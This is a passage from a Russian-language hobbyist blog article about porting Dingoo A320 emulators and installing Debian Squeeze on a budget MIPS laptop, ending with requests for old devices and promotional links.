Далее я решил попробовать портировать эмуляторы с родственной данному ноутбуку Dingoo A320. В родной системе почти никакие эмуляторы не работали даже после подкидывания всех необходимых библиотек (в том числе и uclibc с SDL), однако после chroot'а в систему от Dingoo A320 у меня запустились часть эмуляторов. Однако в этом ноутбуке используется оригинальный непропатченный кривой драйвер фреймбуфера, который постоянно сыпет ошибками и не умеет работать в виртуальном разрешении. Из-за этого, часть эмуляторов выглядело... примерно вот так:

А часть вот так:

И я понял что без патчей в исходном коде не обойтись. Для сборки программ под старые Linux-машины, кросс-компилятор из репозиториев свежих дистрибутивов не подойдет — слишком новая версия glibc. Более того, некоторые устройства могут использовать uclibc вместо glibc, как, например, та же самая динга. Поэтому может потребоваться установка уже готового тулчейна — благо для динги он сохранился в сети. Распаковываем архив в /opt/, добавляем в переменную PATH путь к папке bin/ и пробуем собирать тестовую программу. Всё работает!

Далее предстояло найти исходный код эмуляторов для динги. Часть из них можно найти на гите (в качестве портов на GCW-Zero), часть — на сайте OpenHandhelds. Первым дело я решил портировать эмулятор GameBoy Color. Поскольку эмулятор работает поверх библиотеки SDL, в первую очередь я изменил видеорежим с 240x320 на 800x480...

И ожидаемо ничего не получил, никто растягивать картинку за меня не будет! Поэтому я сначала написал простейшую функцию скейлинга картинки на флоатах с заранее посчитанным шагом интерполяции, затем оптимизировал её до fixed-point арифметики, а после и вовсе решил «запечь» координаты для сэмплинга в один большой массив.

Крайний вариант был самым быстрым, однако в нативном разрешении ноутбука я получил примерно 50%-скорости от реальной консоли — т. е., по сути, не играбельно. При этом в видеорежиме 240x320 всё работало нормально и упор был явно не в скорость растягивания картинки... по каким-то причинам либо блиттер SDL работал слишком медленно, либо драйвер фреймбуфера спотыкался об преобразование форматов пикселя из-за чего всё и тормозило.

Далее я решил попробовать запустить другие эмуляторы. NES, Sega Master System и другие консоли работали отлично... пока я не устанавливал разрешение выше 240x320. Ради интереса, я запустил оболочку для Linux-консолей gmenu2x с Ben NanoNote, которая вместо SDL использует DirectFB и получил вот такую картину. Epic fail...

После этого я решил попробовать накатить всем известный Debian. В отличии от эмуляторов, здесь пересобирать ничего не нужно: достаточно лишь собрать rootfs с необходимыми пакетами, отформатировать SD-карточку и chroot'унутся в систему. Для сборки можно использовать две утилиты — debootstrap и multistrap:

Сначала я хотел накатить что-то относительно современное по типу Debian Buster или Jessie, однако вскоре выяснилось, что ядро 2.6 эти версии системы не поддерживают...

Оказалось что последней версией Debian, поддерживающей ядро 2.6, был Squeeze вышедший в далёком 2011 году. После сборки и копирования рутфс, необходимо было выполнить вторую стадию установки системы, а именно фактическую распаковку и установку пакетов:

Далее мне удалось подкинуть некоторые пакеты и даже попытаться запустить иксы (на 64Мб ОЗУ!)... но затем я погряз в зависимостях и всё таки решил попытаться подкинуть сеть. Выяснилось что в ядре есть поддержка встроенного в чипсет Ethernet-контроллера, однако PHY на плате то не распаян!

❯ Заключение

Вот такая статья о попытке превратить китайский бюджетный MIPS-ноутбук в портативную игровую консоль у нас с вами получилось. И хотя в определенном смысле мне удалось добиться успехов — выйти в рутовую консоль, накатить Debian и запустить эмуляторы в половинном разрешении, всё равно это всё таки больше Epic fail... Но по крайней мере, эти бессонные ночи были очень веселыми!

А вам надеюсь было интересно почитать мой опыт моддинга такого замечательного девайса. Пишите своё мнение в комментариях! Если вам интересна тематика ремонта, моддинга и программирования для гаджетов прошлых лет, подписывайтесь на мой Telegram-канал «Клуб фанатов балдежа», куда я публикую бэкстейджи статей, иногда полезные посты ну и немножечко щитпоста! Если вам интересны мои видео той же тематики — предлагаю подписаться на мой YouTube-канал.

Очень важно! Разыскиваются девайсы для будущих статей!

Друзья! Для подготовки статей с разработкой самопальных игрушек под необычные устройства, объявляется розыск телефонов и консолей! В 2000-х годах, китайцы часто делали дешевые телефоны с игровым уклоном — обычно у них было подобие геймпада (джойстика) или хотя бы две кнопки с верхней части устройства, выполняющие функцию A/B, а также предустановлены эмуляторы NES/Sega. Фишка в том, что на таких телефонах можно выполнять нативный код и портировать на них новые эмуляторы, чем я и хочу заняться и написать об этом подробную статью и записать видео! Если у вас есть телефон подобного формата и вы готовы его задонатить или продать, пожалуйста напишите мне в Telegram (@monobogdan) или в комментарии. Также интересуют смартфоны-консоли на Android (на рынке РФ точно была Func Much-01), там будет контент чуточку другого формата :)

А также я ищу старые (2010-2014) подделки на брендовые смартфоны Samsung, Apple и т. п. Они зачастую работают на весьма интересных чипсетах и поддаются хорошему моддингу, парочку статей уже вышло, но у меня ещё есть идеи по их моддингу! Также может у кого-то остались самые первые смартфоны Xiaomi (серии Mi), Meizu (ещё на Exynos) или телефоны Motorola на Linux (например, EM30, RAZR V8, ROKR Z6, ROKR E2, ROKR E5, ZINE ZN5 и т.п, о них я хотел бы подготовить специальную статью и видео т. к. на самом деле они работали на очень мощных для своих лет процессорах, поддавались серьезному моддингу и были способны запустить даже Quake!). Всем большое спасибо за донаты!

А ещё я держу все свои мобилы в одной корзине при себе (в смысле, все проекты у одного облачного провайдера) — Timeweb. Потому нагло рекомендую то, чем пользуюсь сам — вэлкам: